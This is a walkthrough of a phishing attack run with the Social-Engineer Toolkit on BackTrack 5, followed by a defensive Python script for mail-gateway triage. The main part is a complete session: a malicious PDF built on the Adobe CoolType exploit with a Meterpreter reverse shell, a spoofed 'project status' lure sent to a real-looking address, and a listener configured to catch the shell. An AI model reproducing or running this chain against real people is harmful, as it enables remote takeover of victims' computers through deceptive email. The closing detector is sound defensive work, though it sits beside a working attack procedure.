Social Engineering Attack Case Study: Email Phishing

Implementation on BT5

root@bt:~# cd /pentest/exploits/set
root@bt:/pentest/exploits/set# ./set
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third party Modules
10) Update the Metasploit Framework
11) Update the Social-Engineer Toolkit
12) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set > 1
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
99) Return to Main Menu
set:phishing > 1
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player "Button" Remote Code Execution
6) Adobe CoolType SING Table "uniqueName" Overflow
7) Adobe Flash Player "newfunction" Invalid Pointer Use
8) Adobe Collab. collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
set:payloads > 6
1) Windows Reverse TCP Shell
//Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP
//Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL
//Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64)
//Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64)
//Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64)
//Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS
//Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads > 2
set:payloads > Port to connect back on [443]:
ENTER
[-] Defaulting to port 443...
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the src/program_junk/src/program_junk/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
set:phishing > 2
set:phishing > New filename: TEST.PDF
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
set:phishing > 1
Do you want to use a predefined template or craft
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
set:phishing > 2
set:phishing > Subject of the email: ABC PROJECT STATUS
set:phishing > Send the message as html or plain? 'h' or 'p' [p]: p
set:phishing > Enter the body of the message, hit return for a new line. Control +C when finished:
Next line of the body: Hi Wang
Next line of the body: Please review the ABC project status report.
Next line of the body: Best Reguard!
Next line of the body: Li ming
Next line of the body: ^C
set:phishing > Send email to: 30330XXXX@qq.com
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
set:phishing > 2
set:phishing > From address (ex: moo@example.com): kejiXXX@163.com
set:phishing > Username for open-relay [blank]: kejiXXX
Password for open-relay [blank]:
set:phishing > SMTP email server address (ex. smtp.youremailserveryouown.com): smtp.163.com
set:phishing > Port number for the SMTP server [25]:
set:phishing > Flag this message/s as high priority? [yes|no]:yes
[*] SET has finished delivering the emails
set:phishing > Setup a listener [yes|no]:yes
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 10.10.10.131
LHOST => 10.10.10.131
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 10.10.10.131:443
[*] Starting the payload handler...
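
On the receiving side, a mail-gateway triage check can key on the traits visible in the transcript above: a free-mail sender, the high-priority flag, and a PDF attachment. This is an added example, not part of the original post or of SET; the function names, the free-mail list, the corp.example domain and the sample message are assumptions constructed for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from email.utils import parseaddr

FREEMAIL = {"163.com", "qq.com", "gmail.com"}   # assumed list; tune per organisation
RISKY_EXT = (".pdf", ".rtf", ".rar", ".zip")    # attachment formats named in the menu above
PDF_TOKENS = (b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile", b"/OpenAction")

def build_sample(sender="Li ming <sender@163.com>", flagged=True):
    """Constructed test message (not a captured email); the PDF is an inert stub."""
    m = EmailMessage()
    m["From"], m["To"] = sender, "wang@corp.example"
    m["Subject"] = "ABC PROJECT STATUS"
    m.set_content("Hi Wang\nPlease review the ABC project status report.\n")
    if flagged:
        m["X-Priority"] = "1 (Highest)"
        stub = b"%PDF-1.4\n1 0 obj << /OpenAction 2 0 R >>\n2 0 obj << /S /JavaScript /JS () >>\n"
        m.add_attachment(stub, maintype="application", subtype="pdf", filename="TEST.PDF")
    return m.as_bytes()

def triage(raw, org_domain):
    """Return a list of findings for one raw RFC 5322 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    domain = parseaddr(str(msg.get("From", "")))[1].rpartition("@")[2].lower()
    if domain != org_domain and domain in FREEMAIL:
        findings.append("external-freemail-sender")
    # Priority is carried in X-Priority (1 = highest) or Importance: high.
    if str(msg.get("X-Priority", "")).strip().startswith("1") or \
            str(msg.get("Importance", "")).strip().lower() == "high":
        findings.append("high-priority-flag")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not name.endswith(RISKY_EXT):
            continue
        findings.append("risky-attachment:" + name)
        body = part.get_payload(decode=True) or b""
        # Coarse check: obfuscated names or compressed object streams evade it,
        # so a hit means "send to sandbox", and a miss proves nothing.
        if name.endswith(".pdf") and any(t in body for t in PDF_TOKENS):
            findings.append("pdf-active-content")
    return findings

if __name__ == "__main__":
    for finding in triage(build_sample(), "corp.example"):
        print(finding)
```

No single finding is conclusive; the combination is what justifies quarantining the message and detonating the attachment in a sandbox.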
